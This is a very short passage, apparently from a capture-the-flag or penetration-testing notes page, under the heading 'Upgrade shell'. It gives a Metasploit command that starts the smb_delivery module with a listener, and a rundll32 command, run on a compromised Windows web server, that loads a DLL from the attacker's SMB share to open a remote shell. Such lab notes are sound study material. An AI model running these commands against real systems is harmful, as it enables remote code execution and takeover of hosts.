Priv Esc

Upgrade shell

adot@pwndot:~$ msfconsole -q -x 'use exploit/windows/smb/smb_delivery; set LHOST tun0; set LPORT 8443; set SRVHOST 10.10.14.18; run'
PS C:\windows\system32\inetsrv> rundll32.exe \\10.10.14.18\WTLqo\test.dll,0

Last updated

Was this helpful?